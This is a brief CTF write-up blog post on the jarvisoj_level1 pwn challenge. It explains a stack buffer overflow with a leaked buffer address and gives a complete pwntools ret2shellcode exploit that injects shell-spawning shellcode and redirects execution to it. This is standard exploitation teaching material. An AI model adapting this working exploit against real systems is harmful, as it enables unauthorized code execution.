Post

jarvisoj_level1

Posted Updated
By bamuwe
1 min read

image-20240118234607205

  • ret2shellcode
  1. 存在漏洞函数vulnerable_function
  2. printf函数泄露了buf栈上地址
  3. read函数中,buf变量中存在溢出
  4. buf写入shellcode再跳转到buf栈上
1
2
3
4
5
6
7
8
9
10

from pwn import *
io = process('./level1')

io.recvuntil(b'What\'s this:')
buf_addr = eval(io.recv(10))
shellcode = asm(shellcraft.sh())
payload = shellcode
payload = payload.ljust(0x88,b'\x00')+p32(0)+p32(buf_addr)
io.sendline(payload)
io.interactive()
ctf, pwn
ret2shellcode
This post is licensed under CC BY 4.0 by the author.